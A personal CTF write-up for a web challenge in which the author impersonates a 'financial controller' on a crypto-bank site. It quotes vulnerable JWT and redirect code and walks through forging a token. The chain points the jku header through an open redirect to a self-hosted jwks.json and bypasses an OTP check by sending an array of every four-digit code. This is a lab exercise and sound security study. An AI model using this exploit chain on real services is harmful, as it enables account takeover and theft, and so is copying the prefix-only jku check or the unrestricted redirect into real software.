writeups for challanges solved by me in recent ctfs
In the sprawling digital expanse of the Frontier Cluster, the Frontier Board seeks to cement its dominance by targeting the cornerstone of interstellar commerce: Cluster Credit, a decentralized cryptocurrency that keeps the economy alive. With whispers of a sinister 51% attack in motion, the Board aims to gain majority control of the Cluster Credit blockchain, rewriting transaction history and collapsing the fragile economy of the outer systems. Can you hack into the platform and drain the assets for the financial controller?
đź”— Challenge source
This challenge revolves around a Crypto-Bank website where users can form connections and conduct cryptocurrency transactions. The ultimate goal? Impersonate the financial controller
with the email financial-controller@frontier-board.htb
and drain their CLCR
tokens to capture the flag.
The JWT (JSON Web Token) verification mechanism contains exploitable flaws. Here’s the code snippet that validates the token:
export const verifyToken = async (token) => {
try {
const decodedHeader = jwt.decode(token, { complete: true });
if (!decodedHeader || !decodedHeader.header) {
throw new Error('Invalid token: Missing header');
}
const { kid, jku } = decodedHeader.header;
if (!jku) {
throw new Error('Invalid token: Missing header jku');
}
// TODO: is this secure enough?
if (!jku.startsWith('http://127.0.0.1:1337/')) {
throw new Error('Invalid token: jku claim does not start with http://127.0.0.1:1337/');
}
if (!kid) {
throw new Error('Invalid token: Missing header kid');
}
if (kid !== KEY_ID) {
return new Error('Invalid token: kid does not match the expected key ID');
}
let jwks;
try {
const response = await axios.get(jku);
if (response.status !== 200) {
throw new Error(`Failed to fetch JWKS: HTTP ${response.status}`);
}
jwks = response.data;
} catch (error) {
throw new Error(`Error fetching JWKS from jku: ${error.message}`);
}
if (!jwks || !Array.isArray(jwks.keys)) {
throw new Error('Invalid JWKS: Expected keys array');
}
const jwk = jwks.keys.find((key) => key.kid === kid);
if (!jwk) {
throw new Error('Invalid token: kid not found in JWKS');
}
if (jwk.alg !== 'RS256') {
throw new Error('Invalid key algorithm: Expected RS256');
}
if (!jwk.n || !jwk.e) {
throw new Error('Invalid JWK: Missing modulus (n) or exponent (e)');
}
const publicKey = jwkToPem(jwk);
const decoded = jwt.verify(token, publicKey, { algorithms: ['RS256'] });
return decoded;
} catch (error) {
console.error(`Token verification failed: ${error.message}`);
throw error;
}
};
The code extracts kid and jku values from the token. Here’s what they mean:
To bypass this, we’ll:
openssl genpkey -algorithm RSA -out private_key.pem -pkeyopt rsa_keygen_bits:2048
openssl rsa -pubout -in private_key.pem -out public_key.pem
Your jwks.json
should look like this:
{
"keys": [
{
"alg": "RS256",
"e": "AQAB",
"kid": "123e4567-e89b-12d3-a456-426614174000",
"kty": "RSA",
"n": "<BASE64_ENCODED_MODULUS>",
"use": "sig"
}
]
}
The current implementation restricts jku to http://127.0.0.1:1337/
. However, there’s an open redirect vulnerability in /api/analytics/redirect
:
fastify.get('/redirect', async (req, reply) => {
const { url, ref } = req.query;
if (!url || !ref) {
return reply.status(400).send({ error: 'Missing URL or ref parameter' });
}
// TODO: Should we restrict the URLs we redirect users to?
try {
await trackClick(ref, decodeURIComponent(url));
reply.header('Location', decodeURIComponent(url)).status(302).send();
} catch (error) {
console.error('[Analytics] Error during redirect:', error.message);
reply.status(500).send({ error: 'Failed to track analytics data.' });
}
});
Using this vulnerability, we can redirect the jku URL to a custom one:
http://127.0.0.1:1337/api/analytics/redirect?url=https://temp.staticsave.com/675c4d3d55fac.json&ref=0
Now, the jku
URL will point to our custom jwks.json
file.
Forging the JWT Token
To create a spoofed token, I used the following Python script. This allowed me to forge a valid JWT using the manipulated jwks.json
file.
There was an additional catch—a One-Time Password (OTP) required to complete the transaction. The relevant code for the OTP check was as follows:
if (!otp.includes(validOtp)) {
reply.status(401).send({ error: 'Invalid OTP.' });
return;
}
This check uses the .includes()
method, indicating that the OTP is treated as an array. To bypass it, I brute-forced the OTP by sending an array of all possible four-digit numbers (1000-9999). I automated this process using the final Python script, and it worked like a charm!
Got the flag—definitely a fun challenge!